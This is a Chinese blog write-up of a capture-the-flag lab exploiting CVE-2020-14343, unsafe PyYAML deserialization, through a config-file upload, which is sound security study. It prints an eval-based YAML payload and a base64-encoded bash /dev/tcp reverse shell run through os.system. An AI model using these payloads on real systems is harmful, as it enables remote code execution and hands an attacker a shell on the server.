【春秋云境】CVE-2020-14343 PyYAML中存在不安全的反序列化漏洞

已于 2024-03-26 10:21:14 修改
阅读量424 收藏 10
点赞数 8
分类专栏: 靶场WP 文章标签: 安全 数据库 python
于 2024-03-26 10:09:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137033872
版权

PyYAML中存在不安全的反序列化漏洞。攻击者可利用该漏洞执行任意代码。

开启靶场

在这里插入图片描述

代码分析

反序列化位置

发现告诉你源代码位置了,下载源代码分析。

yaml.load() #将一个yaml文档反序列化为一个Python对象。

在这里插入图片描述

源代码修改过,但不影响实验。
可以看到在登录后,他会检测本地配置文件,然后进行反序列化。

配置文件上传位置

访问upload路径可以将文件保存到配置文件路径
在这里插入图片描述
代码判断为如果登录的IP和配置文件的IP一样则登录成功:
在这里插入图片描述
在本地测试,上传一下文件,hosts为本地测试地址(192.168.1.85),使用Admin用户名登录。(密码无判断)上传文件。
在这里插入图片描述

证明是可以通过文件上传修改配置文件的。
在这里插入图片描述
需要注意的是,使用网站上传时,他会自己再次访问默认路径
在这里插入图片描述
并且默认路径会自动重新修改配置文件。
在这里插入图片描述

漏洞验证

https://github.com/raul23/pyyaml-CVE-2020-14343
可以看到提供了3个POC。

!!python/object/new:tuple #YAML可以表示各种对象,包括Python对象。这里,它尝试序列化一个Python的tuple,其中包含一个map。
!!python/object/new:map  #这是YAML中用于指示创建一个新的Python对象的标签。
!!python/name:eval #这是指向Python的eval函数的引用。eval函数可以执行传入的字符串作为Python代码。
[ print('RCE EXPLOIT!') ] #这是一个Python代码字符串

执行成功
在这里插入图片描述
配置返连shell命令,构建新的payload
在这里插入图片描述

import('os').system(' ')  # python 执行系统函数


#上传问文件内容
 !!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ "__import__('os').system('echo c2ggLWkgPiYgL2Rldi90Y3AvSVAvUE9SVCAwPiYx|base64 -d|bash')" ]]]

返连成功
在这里插入图片描述

获取flag

在这里插入图片描述

踩坑

1、本地复现时候,他提示参数有误。
yaml.load()报错 TypeError: load() missing 1 required positional argument: ‘Loader’ 解决方案
在这里插入图片描述

2、一开始使用pthon上线没有成功
在这里插入图片描述

参考文档

https://blog.csdn.net/chengdong996/article/details/123962061
https://github.com/raul23/pyyaml-CVE-2020-14343

HMX404
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9119
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
Apache Unomi 远程代码执行漏洞(CVE-2020-13942)复现
ximo的博客
03-24 244
简介 Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景用到它。 漏洞描述 在Druid 0.20.0及更早版本,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户提供的JavaScript
Jackson 最新序列漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里应急响应心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 建议大家及时将 Weblogic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x install.sh 命令,然后执行./install.sh即可 如果遇到该问题openssh Your OpenSSL headers do not match your library. vi /etc/ld.so.conf 注释该行 #/usr/local/ssl/lib
Jackson-databind 序列漏洞CVE-2020-36179 ~ CVE-2020-36189)
weixin_45626288的博客
12-01 3833
2021年1月7日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在多个序列远程代码执行漏洞CVE-2020-36179 ~ CVE-2020-36189),利用该漏洞,攻击者可远程执行代码,控制服务器。 2020年12月17日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在序列远程代码执行漏洞CVE-2020-35490/CVE-2020-35491).
PyYaml序列漏洞详解
2302_76827504的博客
04-27 568
果listitems不为空,则调用instance的extend()方法,将listitems的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法,data是一个包含YAML格式字符串的变量,可以是从文件读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
Pyyaml-yaml.load序列漏洞
huichen1233的博客
08-30 2901
YAML 是 “YAML Ain’t a Markup Language”(YAML 不是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。它使用空白符号缩进和大量依赖外观的特色,特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如:许多电子邮件标题格式和YAML非常接近)。blog.yml。...
CVE-2020-14364:QEMU USB模块越界读写漏洞通告
爱国小白帽
08-25 1482
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082502 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-25 0x01 漏洞简述 2020年08月25日,360CERT监测发现qemu 发布了 qemu 内存越界漏洞 的风险通告,该漏洞编号为 CVE-2020-14364 ,漏洞等级:严重,漏洞评分:10。 qemu 已发布安全补丁 攻击者通过 构造特殊的内存数据 ,可造成虚拟机逃逸并执行任意代码 的影响
CVE-2020-9496 ofbiz序列漏洞分析1
08-03
CVE-2020-9496 ofbiz序列漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、...
春秋 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋CVE-2022-25488
一只爱吃橙子的羊
11-30 1295
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
『Java安全』XStream 1.4.13序列漏洞CVE-2020-26217复现与浅析
Ho1aAs‘s Blog
08-15 1361
漏洞是对CVE-2013-7285的绕过新增一个内置黑名单converter过滤EventHandler等}新增安全框架开发者可选择自定义黑白名单、以及使用默认安全策略开发者自定义黑白名单默认安全策略。
春秋CVE-2022-24112
一只爱吃橙子的羊
12-04 2243
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现
kukudeshuo的博客
02-18 386
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现 简介 Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵器。 Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋靶场 WSO2文件上传漏洞CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值